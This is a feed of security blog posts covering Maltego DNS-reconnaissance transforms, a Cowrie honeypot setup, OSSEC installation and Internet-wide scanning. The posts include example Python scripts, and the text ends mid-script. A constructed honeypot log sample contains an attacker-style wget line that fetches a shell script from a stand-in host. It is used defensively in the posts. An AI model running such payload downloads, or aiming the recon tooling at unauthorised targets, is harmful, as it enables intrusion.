Tools – HackerTarget.com https://hackertarget.com Security Vulnerability Scanners and Assessments Fri, 20 Apr 2018 04:37:29 +0000

Maltego Transforms https://hackertarget.com/maltego-transforms/ Fri, 30 Mar 2018 01:49:32 +0000

The post Maltego Transforms appeared first on HackerTarget.com.

Creating local Maltego transforms for our DNS reconnaissance tools has been on my to-do list for a while now. I am happy to say they are now available, and they are a sweet way to perform infrastructure mapping from a domain.

What is Maltego?

Maltego is a cross-platform application for performing link analysis. It discovers relationships between entities and builds a visual representation of the data in a graph-based layout. A transform is a process that pulls new data related to an entity, automatically extending the graph.

Maltego is commonly used for reconnaissance in penetration testing engagements and for open source intelligence (OSINT) analysis. When mapping an organisation's attack surface it lets you see the relationships between infrastructure, services and even users.

Using a Local Maltego Transform

There are two types of transforms within Maltego: remote transforms run on a transform server, while local transforms run on the system running Maltego. The Hacker Target transforms are local transforms, but note that the data is still pulled remotely from the Hacker Target API, so the domain, IP address or name server you are querying is sent to that API and each query counts against the quota described below.

Installing the Hacker Target Maltego Transforms

To run the transforms you will need Python installed along with the requests module, which is used to retrieve the data over an HTTP request. I have not tested on Windows, only on Linux, but it should work on all platforms.

The installation is straightforward. Clone (or download) the git repository, place the files in a local directory, and add the transforms to your Maltego installation, either manually or by importing the mtz file (Maltego configuration file).

Head over to our GitHub page to grab the necessary files and see the detailed installation instructions.

API Quota

With no API key set, you are limited in the number of requests you can perform each day. With a HackerTarget.com membership this limit can be increased. If you have a membership, remember to add your API key to each of the three transform files.

What data is available

Currently there are three transforms available. All are based on host name enumeration, for the express purpose of discovering the attack surface of a target organisation.

  • GetHostNames.py - search against a domain and pull known subdomains
  • GetReverseIP.py - search against an IP address and retrieve other host records pointing to that IP
  • GetSharedDNS.py - search against a name server (NS) and get host records that point to that name server

Obviously this can be an iterative process: as new hosts are discovered, resolve them to IP addresses and perform the reverse IP search; as new domains are discovered, run the host name search against them. Keep in mind that reverse IP results for an address on shared hosting will include unrelated sites that happen to share it, so confirm ownership before treating a discovered host as in scope.
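To show the shape of one of these transforms, here is an added example written for this page; it is not the code from the HackerTarget repository. It takes the selected entity's value (Maltego passes it as the first argument to a local transform), fetches the API response, parses it into host records, and prints the XML response message that Maltego reads from stdout. The API path and the "hostname,ip" line format are assumptions about the API; the maltego.DNSName entity type and the MaltegoTransformResponseMessage format are Maltego's own. Host names returned by a third-party API end up inside XML that Maltego parses, so the example validates and escapes them rather than trusting them, and it turns anything that is not a host record (such as a quota error) into a UI message instead of an entity.

```python
#!/usr/bin/env python3
"""Local Maltego transform: domain -> known host names via the HackerTarget API.

Added example, not the HackerTarget transform code. The API path and the
"hostname,ip" line format of the response are assumptions; adjust them to
match the real API before use.
"""
import re
import sys
from xml.sax.saxutils import escape

API_URL = "https://api.hackertarget.com/hostsearch/?q={query}"  # assumed path
API_KEY = ""  # membership key; leave empty to use the free daily quota

# The API response is third-party data that ends up inside XML parsed by
# Maltego, so only accept well-formed host names and IPv4 addresses.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z][a-z0-9-]{1,62}$",
    re.I)
IPV4_RE = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")


def fetch(query):
    """Retrieve the raw response text (network call; not used by the parser)."""
    import requests  # only needed when the transform runs inside Maltego
    url = API_URL.format(query=query)
    if API_KEY:
        url += "&apikey=" + API_KEY
    return requests.get(url, timeout=30).text


def parse_hosts(text):
    """Split 'hostname,ip' lines into (hostname, ip) tuples.

    Returns (records, messages). Lines that are not a valid host/IP pair,
    such as a quota error from the API, become messages for the Maltego UI
    instead of graph entities.
    """
    records, messages = [], []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(",")
        if (len(parts) == 2 and HOSTNAME_RE.match(parts[0])
                and IPV4_RE.match(parts[1])):
            records.append((parts[0].lower(), parts[1]))
        else:
            messages.append(line)
    return records, messages


def build_response(records, messages):
    """Render the MaltegoTransformResponseMessage, one DNSName entity per host."""
    out = ["<MaltegoMessage><MaltegoTransformResponseMessage><Entities>"]
    for host, ip in records:
        out.append(
            '<Entity Type="maltego.DNSName"><Value>%s</Value><AdditionalFields>'
            '<Field Name="ipv4-address" DisplayName="IP Address">%s</Field>'
            '</AdditionalFields></Entity>' % (escape(host), escape(ip)))
    out.append("</Entities><UIMessages>")
    for msg in messages:
        out.append('<UIMessage MessageType="Inform">%s</UIMessage>' % escape(msg))
    out.append("</UIMessages></MaltegoTransformResponseMessage></MaltegoMessage>")
    return "".join(out)


if __name__ == "__main__":
    # Maltego runs a local transform with the selected entity's value as argv[1].
    found, notes = parse_hosts(fetch(sys.argv[1]))
    print(build_response(found, notes))
```

The reverse IP and shared NS transforms differ only in the API path and the entity type they emit (maltego.Domain for discovered domains), so the same parse and build steps apply; the ipv4-address field on each DNSName entity is what lets you chain straight into the reverse IP search.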

Sounds great, but what does it look like?

Click for Demo

Have Fun

Maltego is a fun way to explore targets. Whether you are penetration testing, running down bug bounties, researching an organisation's infrastructure or simply curious, you can get a lot of value from even the community edition of Maltego (CE) and our free access to the API.

Cowrie Honeypot on Ubuntu https://hackertarget.com/cowrie-honeypot-ubuntu/ Tue, 20 Mar 2018 00:28:21 +0000

The post Cowrie Honeypot on Ubuntu appeared first on HackerTarget.com.

Cowrie is the newer, actively maintained fork of the Kippo honeypot. It has been updated with new features and provides emulation that records the session of an attacker. With this session recording you are able to get a better understanding of the attacker's tools, tactics and procedures (TTPs), a term that is increasingly used in cyber defence and incident response.

Our setup will be very close to a default installation of Cowrie. The host's SSH daemon will run on a high port (22222), Cowrie will listen on 2222, and port 22 (the default SSH port) will be redirected to 2222 using iptables. So an SSH bot or attacker connects to port 22 and is redirected to our honeypot on 2222, while you administer the box on 22222. Confused? Take a look at the diagram.

A warning before we proceed. Honeypots are designed to allow access to a system by an attacker. This could result in compromise of the host if the honeypot has vulnerabilities or is misconfigured. Understand what you are doing and be very careful about running a honeypot anywhere near production kit; a throwaway VPS on its own network, as used here, is the sensible place for it.

Change Default SSH Port

Before installing Cowrie and our dependencies, let's move SSH to port 22222. Keep your current session open while you do this, and confirm you can open a new session on 22222 (and that any firewall or cloud security group allows it) before closing the old one, otherwise you can lock yourself out.

 root@cowrie:~# vi /etc/ssh/sshd_config
# What ports, IPs and protocols we listen for
Port 22222

root@cowrie1:~# systemctl restart ssh
root@cowrie1:~# systemctl status ssh
● ssh.service - OpenBSD Secure Shell server
   Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: enabled)
   Active: active (running) since Mon 2018-03-19 23:21:05 UTC; 5s ago
 Main PID: 9242 (sshd)
    Tasks: 1
   Memory: 1.3M
      CPU: 5ms
   CGroup: /system.slice/ssh.service
           └─9242 /usr/sbin/sshd -D

Mar 19 23:21:05 cowrie1 systemd[1]: Stopped OpenBSD Secure Shell server.
Mar 19 23:21:05 cowrie1 systemd[1]: Starting OpenBSD Secure Shell server...
Mar 19 23:21:05 cowrie1 sshd[9242]: Server listening on 0.0.0.0 port 22222.
Mar 19 23:21:05 cowrie1 sshd[9242]: Server listening on :: port 22222.
Mar 19 23:21:05 cowrie1 systemd[1]: Started OpenBSD Secure Shell server.

root@cowrie1:~# netstat -nap | grep 2222
tcp        0      0 0.0.0.0:22222            0.0.0.0:*               LISTEN      9242/sshd
tcp6       0      0 :::22222                 :::*                    LISTEN      9242/sshd

We can see SSH is now listening on port 22222 from both the systemctl status as well as the netstat output.

Installation of Cowrie Honeypot on Ubuntu

First we will run apt update, as we are on a brand new DigitalOcean VPS. Then we will install the dependencies and create a cowrie user. Running a honeypot as root would be a bad idea: if an attacker ever escapes the emulation, the unprivileged account limits what they can do on the host.

 root@cowrie:~# apt update
root@cowrie:~# apt-get install git python-virtualenv libssl-dev libffi-dev build-essential libpython-dev python2.7-minimal authbind
root@cowrie:~# adduser --disabled-password cowrie
Adding user `cowrie' ...
Adding new group `cowrie' (1000) ...
Adding new user `cowrie' (1000) with group `cowrie' ...
Creating home directory `/home/cowrie' ...
Copying files from `/etc/skel' ...
Changing the user information for cowrie
Enter the new value, or press ENTER for the default
        Full Name []:
        Room Number []:
        Work Phone []:
        Home Phone []:
        Other []:
Is the information correct? [Y/n] Y
root@cowrie1:~# su - cowrie
cowrie@cowrie1:~$

OK, now let's grab the code for Cowrie using git.

cowrie@cowrie1:~$ git clone http://github.com/micheloosterhof/cowrie
Cloning into 'cowrie'...
remote: Counting objects: 9340, done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 9340 (delta 3), reused 2 (delta 0), pack-reused 9330
Receiving objects: 100% (9340/9340), 7.43 MiB | 2.32 MiB/s, done.
Resolving deltas: 100% (6415/6415), done.
Checking connectivity... done.
cowrie@cowrie1:~$

Now we will create a Python virtual environment for Cowrie to run from:

cowrie@cowrie1:~$ cd cowrie
cowrie@cowrie:~/cowrie$ virtualenv cowrie-env
Running virtualenv with interpreter /usr/bin/python2
New python executable in /home/cowrie/cowrie/cowrie-env/bin/python2
Also creating executable in /home/cowrie/cowrie/cowrie-env/bin/python
Installing setuptools, pkg_resources, pip, wheel...done.
cowrie@cowrie1:~$

The next step is to activate the Python virtual environment and install the Python packages that Cowrie needs to run.

cowrie@cowrie1:~/cowrie$ source cowrie-env/bin/activate
(cowrie-env) cowrie@cowrie1:~/cowrie$ pip install --upgrade pip
Requirement already up-to-date: pip in ./cowrie-env/lib/python2.7/site-packages
(cowrie-env) cowrie@cowrie1:~/cowrie$ pip install --upgrade -r requirements.txt
Collecting twisted>=17.1.0 (from -r requirements.txt (line 1))
  Downloading Twisted-17.9.0.tar.bz2 (3.0MB)
    100% |████████████████████████████████| 3.0MB 403kB/s
Collecting cryptography>=0.9.1 (from -r requirements.txt (line 2))
  Downloading cryptography-2.2-cp27-cp27mu-manylinux1_x86_64.whl (2.2MB)
    100% |████████████████████████████████| 2.2MB 544kB/s
Collecting configparser (from -r requirements.txt (line 3))
  Downloading configparser-3.5.0.tar.gz
Collecting pyopenssl (from -r requirements.txt (line 4))
  Downloading pyOpenSSL-17.5.0-py2.py3-none-any.whl (53kB)
    100% |████████████████████████████████| 61kB 9.8MB/s
Collecting pyparsing (from -r requirements.txt (line 5))
  Downloading pyparsing-2.2.0-py2.py3-none-any.whl (56kB)
    100% |████████████████████████████████| 61kB 9.7MB/s
Collecting packaging (from -r requirements.txt (line 6))
  Downloading packaging-17.1-py2.py3-none-any.whl
Collecting appdirs>=1.4.0 (from -r requirements.txt (line 7))
  Downloading appdirs-1.4.3-py2.py3-none-any.whl
Collecting pyasn1_modules (from -r requirements.txt (line 8))
  Downloading pyasn1_modules-0.2.1-py2.py3-none-any.whl (60kB)
    100% |████████████████████████████████| 61kB 9.7MB/s
Collecting attrs (from -r requirements.txt (line 9))
  Downloading attrs-17.4.0-py2.py3-none-any.whl
Collecting service_identity (from -r requirements.txt (line 10))
  Downloading service_identity-17.0.0-py2.py3-none-any.whl
Collecting python-dateutil (from -r requirements.txt (line 11))
  Downloading python_dateutil-2.7.0-py2.py3-none-any.whl (207kB)
    100% |████████████████████████████████| 215kB 5.4MB/s
Collecting tftpy (from -r requirements.txt (line 12))
  Downloading tftpy-0.6.2.tar.gz
Collecting zope.interface>=3.6.0 (from twisted>=17.1.0->-r requirements.txt (line 1))
  Downloading zope.interface-4.4.3-cp27-cp27mu-manylinux1_x86_64.whl (170kB)
    100% |████████████████████████████████| 174kB 4.1MB/s
Collecting constantly>=15.1 (from twisted>=17.1.0->-r requirements.txt (line 1))
  Downloading constantly-15.1.0-py2.py3-none-any.whl
Collecting incremental>=16.10.1 (from twisted>=17.1.0->-r requirements.txt (line 1))
  Downloading incremental-17.5.0-py2.py3-none-any.whl
Collecting Automat>=0.3.0 (from twisted>=17.1.0->-r requirements.txt (line 1))
  Downloading Automat-0.6.0-py2.py3-none-any.whl
Collecting hyperlink>=17.1.1 (from twisted>=17.1.0->-r requirements.txt (line 1))
  Downloading hyperlink-18.0.0-py2.py3-none-any.whl
Collecting cffi>=1.7; platform_python_implementation != "PyPy" (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading cffi-1.11.5-cp27-cp27mu-manylinux1_x86_64.whl (407kB)
    100% |████████████████████████████████| 409kB 3.0MB/s
Collecting enum34; python_version < "3" (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading enum34-1.1.6-py2-none-any.whl
Collecting asn1crypto>=0.21.0 (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading asn1crypto-0.24.0-py2.py3-none-any.whl (101kB)
    100% |████████████████████████████████| 102kB 9.7MB/s
Collecting idna>=2.1 (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading idna-2.6-py2.py3-none-any.whl (56kB)
    100% |████████████████████████████████| 61kB 9.5MB/s
Collecting six>=1.4.1 (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading six-1.11.0-py2.py3-none-any.whl
Collecting ipaddress; python_version < "3" (from cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading ipaddress-1.0.19.tar.gz
Collecting pyasn1<0.5.0,>=0.4.1 (from pyasn1_modules->-r requirements.txt (line 8))
  Downloading pyasn1-0.4.2-py2.py3-none-any.whl (71kB)
    100% |████████████████████████████████| 71kB 9.4MB/s
Requirement already up-to-date: setuptools in ./cowrie-env/lib/python2.7/site-packages (from zope.interface>=3.6.0->twisted>=17.1.0->-r requirements.txt (line 1))
Collecting pycparser (from cffi>=1.7; platform_python_implementation != "PyPy"->cryptography>=0.9.1->-r requirements.txt (line 2))
  Downloading pycparser-2.18.tar.gz (245kB)
    100% |████████████████████████████████| 256kB 4.5MB/s
Building wheels for collected packages: twisted, configparser, tftpy, ipaddress, pycparser
  Running setup.py bdist_wheel for twisted ... done
  Stored in directory: /home/cowrie/.cache/pip/wheels/91/c7/95/0bb4d45bc4ed91375013e9b5f211ac3ebf4138d8858f84abbc
  Running setup.py bdist_wheel for configparser ... done
  Stored in directory: /home/cowrie/.cache/pip/wheels/1c/bd/b4/277af3f6c40645661b4cd1c21df26aca0f2e1e9714a1d4cda8
  Running setup.py bdist_wheel for tftpy ... done
  Stored in directory: /home/cowrie/.cache/pip/wheels/b6/6b/9a/4536837177d943f2aede676c74488f1dd6f2c3c7ef80f8c094
  Running setup.py bdist_wheel for ipaddress ... done
  Stored in directory: /home/cowrie/.cache/pip/wheels/d7/6b/69/666188e8101897abb2e115d408d139a372bdf6bfa7abb5aef5
  Running setup.py bdist_wheel for pycparser ... done
  Stored in directory: /home/cowrie/.cache/pip/wheels/95/14/9a/5e7b9024459d2a6600aaa64e0ba485325aff7a9ac7489db1b6
Successfully built twisted configparser tftpy ipaddress pycparser
Installing collected packages: zope.interface, constantly, incremental, attrs, six, Automat, idna, hyperlink, twisted, pycparser, cffi, enum34, asn1crypto, ipaddress, cryptography, configparser, pyopenssl, pyparsing, packaging, appdirs, pyasn1, pyasn1-modules, service-identity, python-dateutil, tftpy
Successfully installed Automat-0.6.0 appdirs-1.4.3 asn1crypto-0.24.0 attrs-17.4.0 cffi-1.11.5 configparser-3.5.0 constantly-15.1.0 cryptography-2.2 enum34-1.1.6 hyperlink-18.0.0 idna-2.6 incremental-17.5.0 ipaddress-1.0.19 packaging-17.1 pyasn1-0.4.2 pyasn1-modules-0.2.1 pycparser-2.18 pyopenssl-17.5.0 pyparsing-2.2.0 python-dateutil-2.7.0 service-identity-17.0.0 six-1.11.0 tftpy-0.6.2 twisted-17.9.0 zope.interface-4.4.3

OK, that's the initial setup out of the way. Now we need to configure the Cowrie daemon and get it started.

cp cowrie.cfg.dist cowrie.cfg

This creates a config file that we can edit and that won't be overwritten by updates; settings in cowrie.cfg override the defaults in cowrie.cfg.dist.

Editing the configuration file, we will make a few changes from the defaults. First I will change the hostname seen by an attacker after a successful login (it is in the [honeypot] section). Keep it generic and non-obvious, since the default svr04 is a giveaway to anyone who has seen a Cowrie or Kippo honeypot before. Use vim or your favourite text editor to make these changes.

# Hostname for the honeypot. Displayed by the shell prompt of the virtual
# environment
#
# (default: svr04)
hostname = testserver5

The second change I will make is to enable Telnet; SSH is enabled by default. The setting lives in the [telnet] section of the file (the [ssh] section has an enabled option of its own, so make sure you are editing the right one).

[telnet]
# Enable Telnet support, disabled by default
enabled = true

As you can see in the configuration there are many options and things to play with, from logging and alerting to fake addresses and file downloads.

Finally we are ready to start the daemon.

cowrie@cowrie:~/cowrie$ bin/cowrie start                                             
Using default Python virtual environment "/home/cowrie/cowrie/cowrie-env"             
Starting cowrie: [twistd   --umask 0022 --pidfile var/run/cowrie.pid --logger cowrie.python.logfile.logger cowrie ]...

cowrie@cowrie:~/cowrie$ netstat -an                  
Active Internet connections (servers and established)                                 
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2223            0.0.0.0:*               LISTEN

From the netstat we can see the SSH and Telnet daemons of our honeypot listening on 2222 and 2223 respectively.

The last step is to redirect traffic destined for ports 22 and 23 to the high ports 2222 and 2223 using iptables (as root):

root@cowrie:~# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222                                          
root@cowrie:~# iptables -t nat -A PREROUTING -p tcp --dport 23 -j REDIRECT --to-port 2223   

Two things to keep in mind about those rules. They sit in the nat PREROUTING chain, so they only apply to packets arriving from the network; a connection to port 22 from the honeypot host itself will not be redirected, so test from another machine. They are also not persistent across a reboot unless you save them, for example with the iptables-persistent package. Now it is just a waiting game. However, due to the amount of SSH scanning that takes place on the Internet, you will not have to wait long.

cowrie@cowrie:~/cowrie$ tail -f log/cowrie.log

Within 5 minutes I could see SSH connections logging in and running commands within my Honeypot.
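Tailing cowrie.log is fine for watching one session, but the TTPs are easier to pull out of the JSON log that Cowrie also writes (log/cowrie.json by default), one event per line. The following is an added example written for this page, not part of Cowrie: it groups events by session, records the credentials tried, the commands typed and any files the attacker downloaded, and counts the most common username:password pairs across all sessions. The eventid values and field names (session, src_ip, protocol, username, password, input, url, shasum) are assumptions about Cowrie's JSON format; compare them with a line from your own log first. The sample log lines are constructed, and the last one is deliberately cut short to show that a half-written line (normal while the honeypot is still writing) is skipped rather than crashing the run. Attacker input is escaped before printing because a command line can contain terminal escape sequences.

```python
#!/usr/bin/env python3
"""Summarise attacker sessions from Cowrie's JSON log (log/cowrie.json).

Added example, not part of Cowrie. The eventid values and field names used
here are assumptions about Cowrie's JSON output; compare them with a line
from your own log before relying on the script.
"""
import json
import sys
from collections import Counter, defaultdict

# Constructed sample lines (not real honeypot data). The final line is
# deliberately truncated, as the last line of a live log often is.
SAMPLE_LOG = [
    '{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","src_port":51234,'
    '"dst_port":2222,"protocol":"ssh","session":"a1b2c3d4"}',
    '{"eventid":"cowrie.login.failed","username":"root","password":"123456",'
    '"session":"a1b2c3d4"}',
    '{"eventid":"cowrie.login.success","username":"root","password":"password",'
    '"session":"a1b2c3d4"}',
    '{"eventid":"cowrie.command.input","input":"uname -a","session":"a1b2c3d4"}',
    '{"eventid":"cowrie.command.input","input":"wget http://203.0.113.9/x.sh -O /tmp/x.sh",'
    '"session":"a1b2c3d4"}',
    '{"eventid":"cowrie.session.file_download","url":"http://203.0.113.9/x.sh",'
    '"shasum":"0123abcd","session":"a1b2c3d4"}',
    '{"eventid":"cowrie.session.connect","src_ip":"203.0.113.55","protocol":"telnet",'
    '"session":"e5f6a7b8"}',
    '{"eventid":"cowrie.login.failed","username":"admin","password":"admin",'
    '"session":"e5f6a7b8"}',
    '{"eventid":"cowrie.login.failed","username":"root","password":"123456",'
    '"session":"e5f6a7b8"}',
    '{"eventid":"cowrie.session.connect","src_ip":"203.0.113.56","session":"c9',
]


def new_session():
    return {"src_ip": None, "protocol": None, "logins": [], "commands": [],
            "downloads": []}


def summarise(lines):
    """Group events by Cowrie session id and collect what each attacker did.

    Malformed lines are skipped rather than aborting the run.
    """
    sessions = defaultdict(new_session)
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except ValueError:
            continue  # half-written or corrupt line
        sid = ev.get("session")
        if not sid:
            continue
        s = sessions[sid]
        eid = ev.get("eventid", "")
        if eid == "cowrie.session.connect":
            s["src_ip"] = ev.get("src_ip")
            s["protocol"] = ev.get("protocol")
        elif eid in ("cowrie.login.success", "cowrie.login.failed"):
            s["logins"].append((ev.get("username"), ev.get("password"),
                                eid.endswith("success")))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            s["downloads"].append((ev.get("url"), ev.get("shasum")))
    return dict(sessions)


def credential_counts(sessions):
    """Count every username:password pair tried, across all sessions."""
    counts = Counter()
    for s in sessions.values():
        for user, password, _ok in s["logins"]:
            counts["%s:%s" % (user, password)] += 1
    return counts


def report(sessions):
    """One line per session plus the commands run, safe to print to a terminal."""
    out = []
    for sid, s in sorted(sessions.items()):
        logged_in = any(ok for _u, _p, ok in s["logins"])
        out.append("%s %s %s login=%s cmds=%d downloads=%d" % (
            sid, s["src_ip"], s["protocol"], "ok" if logged_in else "failed",
            len(s["commands"]), len(s["downloads"])))
        for cmd in s["commands"]:
            # Attacker input can carry terminal escape sequences; escape it.
            out.append("    $ " + cmd.encode("unicode_escape").decode("ascii"))
    return "\n".join(out)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1]) as fh:
            found = summarise(fh)
    else:
        found = summarise(SAMPLE_LOG)
    print(report(found))
    for cred, n in credential_counts(found).most_common(10):
        print("%5d %s" % (n, cred))
```

Run it as `python3 cowrie_sessions.py log/cowrie.json` from the cowrie directory; with no argument it runs over the constructed sample. The shasum on a file_download event is what you would pivot on when checking whether the same payload has been seen elsewhere.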

OSSEC Introduction and Installation Guide https://hackertarget.com/ossec-introduction-and-installation-guide/ Sat, 17 Mar 2018 08:20:53 +0000

The post OSSEC Introduction and Installation Guide appeared first on HackerTarget.com.

OSSEC is a host-based intrusion detection and prevention system (HIDS).

Best practice security management calls for a layered approach to security; security vulnerability scanning, a firewall, strong passwords, patch management and intrusion detection capabilities are all important layers. Using a HIDS allows you to have real time visibility into what security events are taking place on a server.

The latest version of OSSEC is easy to use and provides a high level of system surveillance for a small amount of effort.

OSSEC provides a number of functions:

  • Real time log monitoring
  • File integrity checking - detects changes to files and system paths
  • Rootkit detection
  • System changes - running services (netstat), disk space and password file changes
  • Real time blocking of detected attacks through firewall rule modification
  • Execute arbitrary commands based on specific events

At the most basic level you can install OSSEC, set an email address and let it do its job alerting you to security-related events on your server. Without active response it does not change the system; it simply gives you security-related visibility.

Tuning is easy, and you will likely only need to tune out a few things to reduce the number of alerts you receive, as the rate of false positives is very low.

Full installation instructions are available here https://ossec.github.io/docs/manual/installation/install-source.html

While this guide was first written for an older version, the installation process is the same for the latest version. Download the tar archive from the OSSEC site and get started.

Updated March 2018 to include the latest version of OSSEC. Our original OSSEC installation guide was released in 2009. It is still a favourite open source security tool that does what it is supposed to do really well.

A quick guide to installing on Ubuntu follows:

wget https://github.com/ossec/ossec-hids/archive/2.9.3.tar.gz

tar zxvf 2.9.3.tar.gz
cd ossec-hids-2.9.3
sudo ./install.sh


1. What kind of installation do you want (server, agent, local or help)?

* If you are doing a basic install to a single server select 'local'.
This creates a single install to monitor only the server you are
installing on. See the documentation on the site for details on
setting up multiple agents on a number of servers that all report back
to a server.

2- Setting up the installation environment.

 - Choose where to install the OSSEC HIDS [/var/ossec]:

   - Installation will be made at  /var/ossec .

3- Configuring the OSSEC HIDS.

 3.1- Do you want e-mail notification? (y/n) [y]:
  - What's your e-mail address?   -- enter your email address here

 - We found your SMTP server as: example.test.com.
  - Do you want to use it? (y/n) [y]: n

  - What's your SMTP server ip/host? enter your preferred SMTP server here

 3.2- Do you want to run the integrity check daemon? (y/n) [y]:
   (this is for file integrity checking, alerts you to changes to
files on your system)

  - Running syscheck (integrity check daemon).

 3.3- Do you want to run the rootkit detection engine? (y/n) [y]:
  (this checks for rootkits on a regular basis)

  - Running rootcheck (rootkit detection).

 3.4- Active response allows you to execute a specific
      command based on the events received. For example,
      you can block an IP address or disable access for
      a specific user.
      More information at:
      http://www.ossec.net/en/manual.html#active-response

  - Do you want to enable active response? (y/n) [y]:
(this can block attacks that meet certain rules)

If you select yes for active response you are adding intrusion prevention capability. This is a good thing, but keep in mind that it is a good idea to white list your own IPs, as you don't want active response to trigger against your IP and auto-block your access. This could happen if you failed multiple SSH logins, or if you were to run a vulnerability scan against your server, as OSSEC would detect this as an attack. Your IP would get blocked, and then you would be unable to SSH to your server to manage it! The white list is configured with <white_list> entries in the <global> section of /var/ossec/etc/ossec.conf; add your management addresses there before you start the service.

After compiling is complete you will be presented with final instructions:

- System is Debian (Ubuntu or derivative).
 - Init script modified to start OSSEC HIDS during boot.

 - Configuration finished properly.

 - To start OSSEC HIDS:
               /var/ossec/bin/ossec-control start

 - To stop OSSEC HIDS:
               /var/ossec/bin/ossec-control stop

 - The configuration can be viewed or modified at /var/ossec/etc/ossec.conf


   Thanks for using the OSSEC HIDS.
   If you have any question, suggestion or if you find any bug,
   contact us at contact@ossec.net or using our public maillist at
   ossec-list@ossec.net
   ( http://www.ossec.net/main/support/ ).

   More information can be found at http://www.ossec.net

   ---  Press ENTER to finish (maybe more information below). ---

That's it, you're done. Just start it up with:

       /var/ossec/bin/ossec-control start

After your initial install you will get a number of alerts (assuming your SMTP is configured correctly): agent starting up, new user logged in and that sort of thing.

So for 15 minutes' work you now have real-time security monitoring of your server. If you would like to test active response, try our online vulnerability scans and test your host's defences.

If you have active response enabled, vulnerability scanners will likely get blocked and the scan will not complete. To run a full scan against your system with active response enabled, add the scanning host to the OSSEC white list (preferred) or disable OSSEC for the duration of the scan (not recommended); make sure you re-enable your protection after the scan completes.

Internet Wide Scanning – Remote access granted https://hackertarget.com/remote-access-granted/ Sun, 26 Nov 2017 12:41:34 +0000

The post Internet Wide Scanning – Remote access granted appeared first on HackerTarget.com.

In the beginning there were Google dorks: by using specific Google search queries it is still possible to find thousands of unsecured, remotely accessible security cameras and printers. Now, with search engines such as Shodan.io and Censys.io, finding open devices on the Internet has gone to the next level.

Google dorks work because Google happened to index the admin login screen of the device. Since the majority of devices still had default credentials, it was then possible to view security cameras in offices around the world, print random junk to unknown printers and much more. While pranks and much laughing may follow, Google dorks highlight the importance of security awareness: that is, understanding what services are listening on your perimeter and changing default credentials.

The following techniques for finding insecure devices connected to the Internet are much more accurate, comprehensive and accessible.

Shodan, the Google of network services

Things started to heat up when John Matherly released the Shodan search tool. In 2009 John started indexing Internet service banners across the net and made the data available at ShodanHQ. It is now commonly known as the Google of network services, and has made numerous appearances in mainstream media such as CNN and Forbes.

Internet Census 2012

2012 saw the release of the Internet Census: an unknown researcher created a botnet that scanned the entire IPv4 address space and then published the results online. Note that this project was audacious and very much illegal, as it used compromised routers to perform the port scanning.

ZMap and Masscan

ZMap was released a few months later by a team of computer scientists at the University of Michigan. The ZMap port scanning tool can scan the entire IPv4 address space in around 45 minutes. You will need a big fat uplink and a fast network card, but that is pretty damn quick. Yet another extremely fast port scanner, Masscan, was released soon after.

Project Sonar

Project Sonar was the next big project in the timeline, launched by HD Moore of Metasploit fame. At Scans.io the results of Internet scanning from HD Moore's critical.io project, along with datasets from the ZMap project, have been made available online for researchers to explore.

Censys

Censys was created in 2015 at the University of Michigan by the security researchers who developed ZMap. The team has been scanning the Internet with it and making the results available through the Censys portal. They have recently launched commercial access to the API.

VNC pwnage

Most recently a security researcher scanned a specific TCP port across the IPv4 address space and took a screenshot of every VNC (remote control software) service that had no password. In 16 minutes he found 30,000 systems with no password, and some of those systems included two hydroelectric plants and surveillance cameras at a casino in the Czech Republic.

Now go Port Scan your Internet facing networks

As seen from the projects, data and articles linked above, all too often networks go untested for services that should not be there, or at least should not be accessible from anywhere in the world over the Internet.

Here are three steps that will help you stay secure, and might even make the world a safer place:

Port Scan your Internet facing IP addresses with Nmap

  • Nmap is simply the best tool for performing a port scan. You can download Nmap and install it on your operating system of choice.
  • Keep in mind that you want to perform the testing from an external IP address, so that you see the network as the Internet does; a scan from inside the perimeter will not show what the firewall actually lets through.
  • Know your network ranges, keep a list of all IP ranges and systems you manage. Ensure all networks and systems are tested.
Firewall, block or restrict access to services that should not be accessible from the Internet

  • Make the necessary changes and get it fixed.
  • Implement a change control process for firewall changes and systems on the perimeter.
Schedule the port scan to be performed on a regular basis

  • Select a schedule based on your risk model: perhaps weekly, daily or monthly.
  • Changes to the network occur all the time: new devices are added, existing devices are changed and firewall rules are modified, and when a change occurs mistakes will happen.
  • Nmap has a tool called ndiff that allows you to compare two port scans; this is a handy tool for scripting regular port scans from a VPS or off-site location.
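Here is an added example of what the comparison step looks like, written for this page rather than taken from Nmap; it does the part of ndiff's job that matters for this procedure (what opened, what closed) with only the Python standard library, so it can sit in a cron job on the VPS beside the scheduled scan. It reads the XML that `nmap -oX` writes; the two sample scans are constructed in that layout and are not real output. Only ports in the open state count as exposure, so a port that moves from open to filtered is reported as closed, and the script exits non-zero when anything new is open so that cron's mail tells you.

```python
#!/usr/bin/env python3
"""Report ports that opened or closed between two Nmap XML scans.

Added example, not part of Nmap: the open-port part of what ndiff does,
standard library only, for a cron job next to the scheduled scan.
Save each scan with: nmap -n -p- -oX scan-$(date +%F).xml <targets>
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample scans (not real Nmap output) in Nmap's XML layout: the
# web host has gained RDP since the last scan, a proxy port is now filtered,
# and a printer has appeared on the range.
OLD_SCAN = """<nmaprun scanner="nmap">
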